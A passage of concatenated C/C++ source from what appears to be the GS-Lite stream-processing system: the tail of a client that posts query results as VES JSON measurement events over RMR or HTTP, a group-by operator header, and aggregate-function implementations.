if( (ep_fd = epoll_create1( 0 )) < 0 ) {
fprintf(stderr, "%s::error:unable to create epoll fd: %d\n", me, errno);
exit( 1 );
}
epe.events = EPOLLIN;
epe.data.fd = rcv_fd;
if( epoll_ctl( ep_fd, EPOLL_CTL_ADD, rcv_fd, &epe ) != 0 ) {
fprintf(stderr, "%s::error:epoll_ctl status not 0 : %s\n", me, strerror(errno));
exit( 1 );
}
rmr_sbuf = rmr_alloc_msg( mrc, MAXLINE ); // alloc first send buffer; subsequent buffers allcoated on send
rmr_rbuf = NULL; // don't need to alloc receive buffer
while( ! rmr_ready( mrc ) ) { // must have a route table before we can send; wait til RMr say it has one
sleep( 10 );
}
fprintf( stderr, "%s: RMR is ready\n", argv[0]);
#else
fprintf(stderr,"Runtime libraries built without RMR support. Rebuild with RMR_ENABLED defined in gsoptions.h\n");
exit(0);
#endif
}
/* initialize host library and the sgroup */
if (verbose>=2) fprintf(stderr,"Initializing gscp\n");
if (ftaapp_init(bufsz)!=0) {
fprintf(stderr,"%s::error:could not initialize gscp\n", me);
exit(1);
}
signal(SIGTERM, hand);
signal(SIGINT, hand);
schema = ftaapp_get_fta_schema_by_name(argv[0]);
if (schema < 0) {
fprintf(stderr,"%s::error:could not get fta '%s' schema\n",
me ,argv[0]);
exit(1);
}
n_expected_param = ftaschema_parameter_len(schema);
if (n_expected_param == 0) {
pblk = 0;
pblklen = 0;
} else {
n_actual_param = argc-1;
if(n_actual_param < n_expected_param){
fprintf(stderr,"Error, %d query parameters expected, %d provided.\n",n_expected_param, n_actual_param);
exit(1);
}
/* parse the params */
for (lcv = 1 ; lcv < argc ; lcv++) {
char *k, *e;
int rv;
k = argv[lcv];
e = k;
while (*e && *e != '=') e++;
if (*e == 0) {
fprintf(stderr,"param parse error '%s' (fmt 'key=val')\n",
argv[lcv]);
exit(1);
}
*e = 0;
rv = ftaschema_setparam_by_name(schema, k, e+1, strlen(e+1));
*e = '=';
if (rv < 0) {
fprintf(stderr,"param setparam error '%s' (fmt 'key=val')\n",
argv[lcv]);
exit(1);
}
}
if (ftaschema_create_param_block(schema, &pblk, &pblklen) < 0) {
fprintf(stderr, "ftaschema_create_param_block failed!\n");
exit(1);
}
}
// ftaschema_free(schema); /* XXXCDC */ // the schema continues to be used
if (verbose>=2) fprintf(stderr,"Initalized FTA\n");
fta_id=ftaapp_add_fta(argv[0],0,0,0,pblklen,pblk);
if (fta_id.streamid==0) {
fprintf(stderr,"%s::error:could not initialize fta %s\n",
me, argv[0]);
exit(1);
}
/* XXXCDC: pblk is malloc'd, should we free it? */
if (verbose>=2) fprintf(stderr,"Get schema handle\n");
if ((schema=ftaapp_get_fta_schema(fta_id))<0) {
fprintf(stderr,"%s::error:could not get schema\n", me);
exit(1);
}
if ((numberoffields=ftaschema_tuple_len(schema))<0) {
fprintf(stderr,"%s::error:could not get number of fields in schema\n",
me);
exit(1);
}
if (verbose>=1) {
for(y=0; y<numberoffields;y++) {
printf("%s",ftaschema_field_name(schema,y));
if (y<numberoffields-1) printf("|");
}
printf("\n");
}
if (xit) { // -X in command line
gettimeofday(&tve, 0);
timersub(&tve, &tvs, &tvd);
printf("TIME= %ld%06d sec\n", tvd.tv_sec, tvd.tv_usec);
hand(0); // effectively an exit
}
if (tcpport!=0) {
wait_for_client();
}
start_time = time(NULL);
int measurement_interval_pos = -1; // extract measurementInterval if present
char *field_names[numberoffields];
for(y=0; y<numberoffields;y++) {
field_names[y] = strdup(ftaschema_field_name(schema,y));
if(strcmp(field_names[y], "measurementInterval")==0)
measurement_interval_pos = y;
}
struct timeval tsample;
gettimeofday(&tsample, 0);
char start_ts[100], curr_ts[100];
sprintf(start_ts,"%ld%06d", tsample.tv_sec, tsample.tv_usec);
long unsigned int lineno=0;
long unsigned int seqno=0;
double measurement_interval;
while((code=ftaapp_get_tuple(&rfta_id,&rsize,rbuf,2*MAXTUPLESZ,0))>=0) {
lineno++;
if (dump) // -D in command line
continue;
if (ftaschema_is_eof_tuple(schema, rbuf)) {
/* initiate shutdown or something of that nature */
printf("#All data proccessed\n");
exit(0);
}
if (!rsize)
continue;
if (verbose >=2) {
snprintf(linebuf,MAXLINE,"RESULT CODE => %u\n",code);
emit_line();
}
if ((code==0)&&(rfta_id.streamid == fta_id.streamid)) {
seqno++;
gettimeofday(&tsample, 0);
sprintf(curr_ts,"%ld%06d", tsample.tv_sec, tsample.tv_usec);
int pos;
if(ves_version < 7){
pos = snprintf(linebuf, MAXLINE,
"{\"event\": { \"commonEventHeader\": { "
"\"domain\": \"measurementsForVfScaling\", "
"\"eventId\": \"%s%u\", "
"\"eventType\": \"%s\", "
"\"eventName\": \"Measurement_MC_%s\", "
"\"lastEpochMicrosec\": %s, "
"\"priority\": \"Normal\", "
"\"reportingEntityName\": \"GS-LITE MC\", "
"\"sequence\": %u, "
"\"sourceName\": \"meas_cmpgn_xapp\", "
"\"startEpochMicrosec\": %s, "
"\"version\": 5 "
"}, "
"\"measurementsForVfScalingFields\": { "
"\"additionalFields\": ["
,argv[0],lineno, argv[0], argv[0], curr_ts, seqno, start_ts
);
}else{
pos = snprintf(linebuf, MAXLINE,
"{\"event\": { \"commonEventHeader\": { "
"\"domain\": \"measurement\", "
"\"eventId\": \"%s%u\", "
"\"eventType\": \"%s\", "
"\"eventName\": \"Measurement_MC_%s\", "
"\"lastEpochMicrosec\": %s, "
"\"priority\": \"Normal\", "
"\"reportingEntityName\": \"GS-LITE MC\", "
"\"sequence\": %u, "
"\"sourceName\": \"meas_cmpgn_xapp\", "
"\"startEpochMicrosec\": %s, "
"\"version\": \"4.0.1\", "
"\"vesEventListenerVersion\": \"7.0.1\" "
"}, "
"\"measurementFields\": { "
"\"additionalFields\": {"
,argv[0],lineno, argv[0], argv[0], curr_ts, seqno, start_ts
);
}
measurement_interval = 0;
for(y=0; y<numberoffields;y++) {
struct access_result ar;
// if (verbose>=2)
// printf("%s->",ftaschema_field_name(schema,y));
if(y>0){
linebuf[pos]=',';
pos++;
}
ar=ftaschema_get_field_by_index(schema,y,rbuf,rsize);
switch (ar.field_data_type) {
case INT_TYPE:
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"%d\"}",field_names[y], ar.r.i);
else
pos += snprintf(linebuf+pos,MAXLINE-pos," \"%s\": \"%d\"",field_names[y], ar.r.i);
if(y==measurement_interval_pos)
measurement_interval = (double)ar.r.i;
break;
case UINT_TYPE:
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"%u\"}",field_names[y], ar.r.ui);
else
pos += snprintf(linebuf+pos,MAXLINE-pos," \"%s\": \"%u\"",field_names[y], ar.r.ui);
if(y==measurement_interval_pos)
measurement_interval = (double)ar.r.ui;
break;
case IP_TYPE:
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"%u.%u.%u.%u\"}",field_names[y], ar.r.ui>>24&0xff,
ar.r.ui>>16&0xff,
ar.r.ui>>8&0xff,
ar.r.ui&0xff);
else
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"%u.%u.%u.%u\"",field_names[y], ar.r.ui>>24&0xff,
ar.r.ui>>16&0xff,
ar.r.ui>>8&0xff,
ar.r.ui&0xff);
break;
case IPV6_TYPE:
{
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"",field_names[y]);
else
pos += snprintf(linebuf+pos,MAXLINE-pos," \"%s\": \"",field_names[y]);
unsigned x;
unsigned zc=0;
for(x=0;x<4;x++) { if (ar.r.ip6.v[x]==0) zc++;}
if (zc!=4) {
snprintf(linebuf,MAXLINE,"");
for(x=0;x<8;x++) {
unsigned char * a = (unsigned char *) &(ar.r.ip6.v[0]);
unsigned y;
y=((unsigned)a[2*x])<<8|((unsigned) a[2*x+1]);
pos += snprintf(linebuf+pos,MAXLINE-pos,"%04x",y);
if (x<7){
pos += snprintf(linebuf+pos,MAXLINE-pos,":");
}
}
} else {
pos+=snprintf(linebuf+pos,MAXLINE-pos,"::");
}
if(ves_version < 7)
pos += snprintf(linebuf+pos, MAXLINE-pos,"\"}");
else
pos += snprintf(linebuf+pos, MAXLINE-pos,"\"");
}
break;
case USHORT_TYPE:
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"%u\"}",field_names[y], ar.r.ui);
else
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"%u\"}",field_names[y], ar.r.ui);
if(y==measurement_interval_pos)
measurement_interval = (double)ar.r.ui;
break;
case BOOL_TYPE:
if(ves_version < 7){
if (ar.r.ui==0) {
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"FALSE\"}",field_names[y]);
} else {
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"TRUE\"}",field_names[y]);
}
}else{
if (ar.r.ui==0) {
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"FALSE\"",field_names[y]);
} else {
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"TRUE\"",field_names[y]);
}
}
break;
case ULLONG_TYPE:
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"%llu\"}",field_names[y], ar.r.ul);
else
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"%llu\"",field_names[y], ar.r.ul);
if(y==measurement_interval_pos)
measurement_interval = (double)ar.r.ul;
break;
case LLONG_TYPE:
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"%lld\"}",field_names[y], ar.r.l);
else
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"%lld\"",field_names[y], ar.r.l);
if(y==measurement_interval_pos)
measurement_interval = (double)ar.r.l;
break;
case FLOAT_TYPE:
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"%f\"}",field_names[y], ar.r.f);
else
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"%f\"",field_names[y], ar.r.f);
if(y==measurement_interval_pos)
measurement_interval = (double)ar.r.f;
break;
case TIMEVAL_TYPE:
{
gs_float_t t;
t= ar.r.t.tv_usec;
t=t/1000000;
t=t+ar.r.t.tv_sec;
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"%f\"}",field_names[y], t);
else
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"%f\"",field_names[y], t);
}
break;
case VSTR_TYPE:
{
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"",field_names[y]);
else
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"",field_names[y]);
int x;
int c;
char * src;
src=(char*)ar.r.vs.offset;
for(x=0;x<ar.r.vs.length;x++){
c=src[x];
if ((c<='~') && (c>=' ')) {
if (pos<MAXLINE-1) {
linebuf[pos]=c;
pos++;
}
} else {
if (pos<MAXLINE-1) {
linebuf[pos]='.';
pos++;
}
}
}
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"}");
else
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"");
}
break;
default:
linebuf[0]=0;
break;
}
}
if(ves_version < 7){
snprintf(linebuf+pos, MAXLINE-pos,
"], \"measurementInterval\": %f, \"measurementsForVfScalingVersion\": 1"
"}}}\n", measurement_interval
);
}else{
snprintf(linebuf+pos, MAXLINE-pos,
"}, \"measurementInterval\": %f, \"measurementFieldsVersion\": \"4.0\""
"}}}\n", measurement_interval
);
}
#ifdef RMR_ENABLED
if (rmr_port) {
rmr_sbuf->mtype = rmr_mtype; // fill in the message bits
rmr_sbuf->len = strlen(linebuf) + 1; // our receiver likely wants a nice acsii-z string
memcpy(rmr_sbuf->payload, linebuf, rmr_sbuf->len);
rmr_sbuf->state = 0;
rmr_sbuf = rmr_send_msg( mrc, rmr_sbuf); // send it (send returns an empty payload on success, or the original payload on fail/retry)
while( rmr_sbuf->state == RMR_ERR_RETRY ) { // soft failure (device busy?) retry
rmr_sbuf = rmr_send_msg( mrc, rmr_sbuf); // retry send until it's good (simple test; real programmes should do better)
}
if(rmr_sbuf->state != RMR_OK) {
gslog(LOG_WARNING, "rmr_send_msg() failure, strerror(errno) is %s", strerror(errno));
rmr_post_failure_cnt++;
} else
rmr_post_success_cnt++;
if (((rmr_post_success_cnt+rmr_post_failure_cnt) % STAT_FREQUENCY) == 0)
gslog(LOG_WARNING, "%s: successful RMR posts - %llu, failed RMR posts - %llu", argv[0], rmr_post_success_cnt, rmr_post_failure_cnt);
}
#endif
if(curl_address==NULL){
if (!rmr_port) // if neither VES collector nor RMR is specified print to standard output
emit_line();
}else{
http_post_request_hdr(curl_endpoint, curl_url, linebuf, &http_code, curl_auth);
if(http_code != 200 && http_code != 202){
post_failure_cnt++;
gslog(LOG_WARNING, "http return code is %d",http_code);
} else {
post_success_cnt++;
}
if (((post_success_cnt+post_failure_cnt) % STAT_FREQUENCY) == 0)
gslog(LOG_WARNING, "%s: successful ves posts - %llu, failed ves posts - %llu", argv[0], post_success_cnt, post_failure_cnt);
}
if (verbose!=0) fflush(stdout);
} else {
if (rfta_id.streamid != fta_id.streamid)
fprintf(stderr,"Got unknown streamid %llu \n",rfta_id.streamid);
}
// whenever we receive a temp tuple check if we reached time limit
if ((code==2) && tlimit && (time(NULL)-start_time)>=tlimit) {
fprintf(stderr,"Reached time limit of %d seconds\n",tlimit);
ftaapp_exit();
exit(0);
}
}
}
<file_sep>/** ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#ifndef GROUPBY_OPERATOR_H
#define GROUPBY_OPERATOR_H
#include "host_tuple.h"
#include "base_operator.h"
#include <list>
#include "hash_table.h"
using namespace std;
template <class groupby_func, class group, class aggregate, class hasher_func, class equal_func>
class groupby_operator : public base_operator {
private :
groupby_func func;
hash_table<group, aggregate, hasher_func, equal_func> group_table;
bool flush_finished;
typename hash_table<group, aggregate, hasher_func, equal_func>::iterator flush_pos;
int n_patterns;
public:
groupby_operator(int schema_handle, const char* name) : base_operator(name), func(schema_handle) {
flush_finished = true;
n_patterns = func.n_groupby_patterns();
}
int accept_tuple(host_tuple& tup, list<host_tuple>& result) {
// Push out completed groups
// extract the key information from the tuple and
// copy it into buffer
group grp;
if (!func.create_group(tup, (gs_sp_t)&grp)) {
if(func.disordered()){
// fprintf(stderr,"Out of order record in %s\n",op_name);
return 0;
}
if (func.flush_needed()){
flush_old(result);
}
if (func.temp_status_received()) {
host_tuple temp_tup;
if (!func.create_temp_status_tuple(temp_tup, flush_finished)) {
temp_tup.channel = output_channel;
result.push_back(temp_tup);
}
}
tup.free_tuple();
return 0;
}
if(func.disordered()){
// fprintf(stderr,"Out of order record in %s\n",op_name);
return 0;
}
typename hash_table<group, aggregate, hasher_func, equal_func>::iterator iter;
if ((iter = group_table.find(grp)) != group_table.end()) {
// Temporal GBvar is part of the group so no flush is needed.
func.update_aggregate(tup, grp, (*iter).second);
}else{
if (func.flush_needed()) {
flush_old(result);
}
if(n_patterns <= 1){
char aggr_buffer[sizeof(aggregate)];
// create an aggregate in preallocated buffer
func.create_aggregate(tup, aggr_buffer);
// neeed operator= doing a deep copy
group_table.insert(grp, (*(aggregate*)aggr_buffer));
}else{
int p;
// TODO this code is wrong, must check if each pattern is in the group table.
for(p=0;p<n_patterns;++p){
// need shallow copy constructor for groups
group new_grp(grp, func.get_pattern(p));
char aggr_buffer[sizeof(aggregate)];
func.create_aggregate(tup, aggr_buffer);
// neeed operator= doing a deep copy
group_table.insert(new_grp, (*(aggregate*)aggr_buffer));
}
}
}
tup.free_tuple();
return 0;
}
int flush(list<host_tuple>& result) {
host_tuple tup;
flush_pos = group_table.begin();
// If the table isn't empty, flush it now.
if (!group_table.empty()) {
for (; flush_pos != group_table.end(); ++flush_pos) {
bool failed = false;
tup = func.create_output_tuple((*flush_pos).first,(*flush_pos).second, failed);
if (!failed) {
tup.channel = output_channel;
result.push_back(tup);
}
// free((*flush_pos).second);
}
group_table.clear();
}
flush_finished = true;
return 0;
}
int flush_old(list<host_tuple>& result) {
flush(result);
group_table.clear();
group_table.resize();
return 0;
}
int set_param_block(int sz, void * value) {
func.set_param_block(sz, value);
return 0;
}
int get_temp_status(host_tuple& result) {
result.channel = output_channel;
return func.create_temp_status_tuple(result, flush_finished);
}
int get_blocked_status () {
return -1;
}
unsigned int get_mem_footprint() {
return group_table.get_mem_footprint();
}
};
#endif // GROUPBY_OPERATOR_H
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include "rts_udaf.h"
#include "gsconfig.h"
#include "gstypes.h"
#include <stdio.h>
#include <limits.h>
#include <math.h>
#define max(a,b) ((a) > (b) ? (a) : (b))
#define MAX_BUFSIZE 128
/****************************************************************/
/* LFTA functions */
/****************************************************************/
////////////////////////////////////////////////////////////////////////
//// avg_udaf
typedef struct avg_udaf_lfta_struct_t{
gs_int64_t sum;
gs_uint32_t cnt;
} avg_udaf_lfta_struct_t;
void avg_udaf_lfta_LFTA_AGGR_INIT_(gs_sp_t b){
avg_udaf_lfta_struct_t *s = (avg_udaf_lfta_struct_t *)b;
s->sum = 0;
s->cnt = 0;
}
void avg_udaf_lfta_LFTA_AGGR_UPDATE_(gs_sp_t b,gs_uint32_t v){
avg_udaf_lfta_struct_t *s = (avg_udaf_lfta_struct_t *)b;
s->sum += v;
s->cnt++;
}
gs_retval_t avg_udaf_lfta_LFTA_AGGR_FLUSHME_(gs_sp_t b){
return 0;
}
void avg_udaf_lfta_LFTA_AGGR_OUTPUT_(struct gs_string *r,gs_sp_t b){
r->length = 12;
r->data = b;
}
void avg_udaf_lfta_LFTA_AGGR_DESTROY_(gs_sp_t b){
return;
}
/////////////////////////////////////////////////////////
// Moving sum
typedef struct moving_sum_lfta_struct{
gs_uint32_t sum;
gs_uint32_t N;
} moving_sum_lfta_struct;
void moving_sum_lfta_LFTA_AGGR_INIT_(gs_sp_t b){
moving_sum_lfta_struct *s = (moving_sum_lfta_struct *)b;
s->sum = 0;
s->N = 0;
}
void moving_sum_lfta_LFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint32_t v, gs_uint32_t N){
moving_sum_lfta_struct *s = (moving_sum_lfta_struct *)b;
s->sum += v;
s->N = N;
}
gs_retval_t moving_sum_lfta_LFTA_AGGR_FLUSHME_(gs_sp_t b){
return 0;
}
void moving_sum_lfta_LFTA_AGGR_OUTPUT_(gs_uint64_t *r, gs_sp_t b){
moving_sum_lfta_struct *s = (moving_sum_lfta_struct *)b;
*r = ((gs_uint64_t)(s->N) << 32) | (gs_uint64_t)(s->sum);
}
gs_retval_t moving_sum_lfta_LFTA_AGGR_DESTROY_(gs_sp_t b){
return 0;
}
/////////////////////////////////////////////////////////
// FIRST and LAST aggregates
///////////////// FIRST
// uint
void FIRST_lfta_LFTA_AGGR_INIT_(gs_uint32_t* scratch) {
*scratch = UINT_MAX; // we will encode uninitialized value of UINT_MAX
return;
}
void FIRST_lfta_LFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val) {
if (*scratch == UINT_MAX)
*scratch = val;
return;
}
gs_retval_t FIRST_lfta_LFTA_AGGR_FLUSHME_( gs_uint32_t* scratch) { return 0; }
void FIRST_lfta_LFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch) {
*res = *scratch;
}
void FIRST_lfta_LFTA_AGGR_DESTROY_(gs_uint32_t* scratch) { return; }
// int
void FIRST_INT_lfta_LFTA_AGGR_INIT_(gs_int32_t* scratch) {
*scratch = INT_MAX; // we will encode uninitialized value of ULLONG_MAX
return;
}
void FIRST_INT_lfta_LFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val) {
if (*scratch == INT_MAX)
*scratch = val;
return;
}
gs_retval_t FIRST_INT_lfta_LFTA_AGGR_FLUSHME_( gs_int32_t* scratch) { return 0; }
void FIRST_INT_lfta_LFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch) {
*res = *scratch;
}
void FIRST_INT_lfta_LFTA_AGGR_DESTROY_(gs_int32_t* scratch) { return; }
// ullong
void FIRST_ULL_lfta_LFTA_AGGR_INIT_(gs_uint64_t* scratch) {
*scratch = ULLONG_MAX; // we will encode uninitialized value of ULLONG_MAX
return;
}
void FIRST_ULL_lfta_LFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val) {
if (*scratch == ULLONG_MAX)
*scratch = val;
return;
}
gs_retval_t FIRST_ULL_lfta_LFTA_AGGR_FLUSHME_( gs_uint64_t* scratch) { return 0; }
void FIRST_ULL_lfta_LFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch) {
*res = *scratch;
}
void FIRST_ULL_lfta_LFTA_AGGR_DESTROY_(gs_uint64_t* scratch) { return; }
// llong
void FIRST_LL_lfta_LFTA_AGGR_INIT_(gs_int64_t* scratch) {
*scratch = LLONG_MAX; // we will encode uninitialized value of ULLONG_MAX
return;
}
void FIRST_LL_lfta_LFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val) {
if (*scratch == LLONG_MAX)
*scratch = val;
return;
}
gs_retval_t FIRST_LL_lfta_LFTA_AGGR_FLUSHME_( gs_int64_t* scratch) { return 0; }
void FIRST_LL_lfta_LFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch) {
*res = *scratch;
}
void FIRST_LL_lfta_LFTA_AGGR_DESTROY_(gs_int64_t* scratch) { return; }
// string
void FIRST_STR_lfta_LFTA_AGGR_INIT_(struct gs_string* scratch) {
scratch->data = NULL;
return;
}
void FIRST_STR_lfta_LFTA_AGGR_UPDATE_(struct gs_string* scratch, struct gs_string* val) {
if (!scratch->data) {
str_assign_with_copy(NULL, scratch, val);
}
return;
}
gs_retval_t FIRST_STR_lfta_LFTA_AGGR_FLUSHME_(struct gs_string* scratch) { return 0; }
void FIRST_STR_lfta_LFTA_AGGR_OUTPUT_(struct gs_string* res, struct gs_string* scratch) {
*res = *scratch;
}
void FIRST_STR_lfta_LFTA_AGGR_DESTROY_(struct gs_string* scratch) {
if (scratch->data)
fta_free(NULL, scratch->data);
}
///////////////// LAST
// uint
void LAST_lfta_LFTA_AGGR_INIT_(gs_uint32_t* scratch) { }
void LAST_lfta_LFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val) {
*scratch = val;
return;
}
gs_retval_t LAST_lfta_LFTA_AGGR_FLUSHME_( gs_uint32_t* scratch) { return 0; }
void LAST_lfta_LFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch) {
*res = *scratch;
}
void LAST_lfta_LFTA_AGGR_DESTROY_(gs_uint32_t* scratch) { return; }
// int
void LAST_INT_lfta_LFTA_AGGR_INIT_(gs_int32_t* scratch) { }
void LAST_INT_lfta_LFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val) {
*scratch = val;
return;
}
gs_retval_t LAST_INT_lfta_LFTA_AGGR_FLUSHME_( gs_int32_t* scratch) { return 0; }
void LAST_INT_lfta_LFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch) {
*res = *scratch;
}
void LAST_INT_lfta_LFTA_AGGR_DESTROY_(gs_int32_t* scratch) { return; }
// ullong
void LAST_ULL_lfta_LFTA_AGGR_INIT_(gs_uint64_t* scratch) { }
void LAST_ULL_lfta_LFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val) {
*scratch = val;
return;
}
gs_retval_t LAST_ULL_lfta_LFTA_AGGR_FLUSHME_( gs_uint64_t* scratch) { return 0; }
void LAST_ULL_lfta_LFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch) {
*res = *scratch;
}
void LAST_ULL_lfta_LFTA_AGGR_DESTROY_(gs_uint64_t* scratch) { return; }
// llong
void LAST_LL_lfta_LFTA_AGGR_INIT_(gs_int64_t* scratch) { }
void LAST_LL_lfta_LFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val) {
*scratch = val;
return;
}
gs_retval_t LAST_LL_lfta_LFTA_AGGR_FLUSHME_( gs_int64_t* scratch) { return 0; }
void LAST_LL_lfta_LFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch) {
*res = *scratch;
}
void LAST_LL_lfta_LFTA_AGGR_DESTROY_(gs_int64_t* scratch) { return; }
// string
void LAST_STR_lfta_LFTA_AGGR_INIT_(struct gs_string* scratch) {
scratch->data = NULL;
return;
}
void LAST_STR_lfta_LFTA_AGGR_UPDATE_(struct gs_string* scratch, struct gs_string* val) {
if (!scratch->data) {
str_assign_with_copy(NULL, scratch, val);
} else {
if (!str_compare(scratch, val)) {
fta_free(NULL, scratch->data);
str_assign_with_copy(NULL, scratch, val);
}
}
return;
}
gs_retval_t LAST_STR_lfta_LFTA_AGGR_FLUSHME_(struct gs_string* scratch) { return 0; }
void LAST_STR_lfta_LFTA_AGGR_OUTPUT_(struct gs_string* res, struct gs_string* scratch) {
*res = *scratch;
}
void LAST_STR_lfta_LFTA_AGGR_DESTROY_(struct gs_string* scratch) {
if (scratch->data)
fta_free(NULL, scratch->data);
}
////////////////////////////////////////////////////////
// count_diff aggregate
struct lfta_count_diff_scratch{
gs_uint32_t count;
union{
gs_uint32_t ui;
gs_int32_t i;
gs_uint64_t ul;
gs_int64_t l;
} first;
union{
gs_uint32_t ui;
gs_int32_t i;
gs_uint64_t ul;
gs_int64_t l;
} last;
};
// unsigned int
void count_diff_lfta_ui_LFTA_AGGR_INIT_(gs_sp_t s) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
scratch->count = 0;
scratch->first.l = 0;
scratch->last.l = 0;
}
void count_diff_lfta_ui_LFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint32_t val) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
if(scratch->count==0){
scratch->count = 1;
scratch->first.ui = val;
}else{
if(scratch->last.ui != val)
scratch->count++;
}
scratch->last.ui = val;
}
void count_diff_lfta_ui_LFTA_AGGR_OUTPUT_(struct gs_string * res, gs_sp_t scratch) {
res->data = (gs_sp_t)scratch;
res->length = sizeof(struct lfta_count_diff_scratch);
res->owner = NULL;
}
void count_diff_lfta_ui_LFTA_AGGR_DESTROY_(gs_sp_t s) { }
gs_retval_t count_diff_lfta_ui_LFTA_AGGR_FLUSHME_(gs_sp_t s) {
return 0;
}
// int
void count_diff_lfta_i_LFTA_AGGR_INIT_(gs_sp_t s) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
scratch->count = 0;
scratch->first.l = 0;
scratch->last.l = 0;
}
void count_diff_lfta_i_LFTA_AGGR_UPDATE_(gs_sp_t s, gs_int32_t val) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
if(scratch->count==0){
scratch->count = 1;
scratch->first.i = val;
}else{
if(scratch->last.i != val)
scratch->count++;
}
scratch->last.i = val;
}
void count_diff_lfta_i_LFTA_AGGR_OUTPUT_(struct gs_string * res, gs_sp_t scratch) {
res->data = (gs_sp_t)scratch;
res->length = sizeof(struct lfta_count_diff_scratch);
res->owner = NULL;
}
void count_diff_lfta_i_LFTA_AGGR_DESTROY_(gs_sp_t s) { }
gs_retval_t count_diff_lfta_i_LFTA_AGGR_FLUSHME_(gs_sp_t s) {
return 0;
}
// unsigned long long int
void count_diff_lfta_ul_LFTA_AGGR_INIT_(gs_sp_t s) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
scratch->count = 0;
scratch->first.l = 0;
scratch->last.l = 0;
}
void count_diff_lfta_ul_LFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint64_t val) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
if(scratch->count==0){
scratch->count = 1;
scratch->first.ul = val;
}else{
if(scratch->last.ul != val)
scratch->count++;
}
scratch->last.ul = val;
}
void count_diff_lfta_ul_LFTA_AGGR_OUTPUT_(struct gs_string * res, gs_sp_t scratch) {
res->data = (gs_sp_t)scratch;
res->length = sizeof(struct lfta_count_diff_scratch);
res->owner = NULL;
}
void count_diff_lfta_ul_LFTA_AGGR_DESTROY_(gs_sp_t s) { }
gs_retval_t count_diff_lfta_ul_LFTA_AGGR_FLUSHME_(gs_sp_t s) {
return 0;
}
// long long int
void count_diff_lfta_l_LFTA_AGGR_INIT_(gs_sp_t s) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
scratch->count = 0;
scratch->first.l = 0;
scratch->last.l = 0;
}
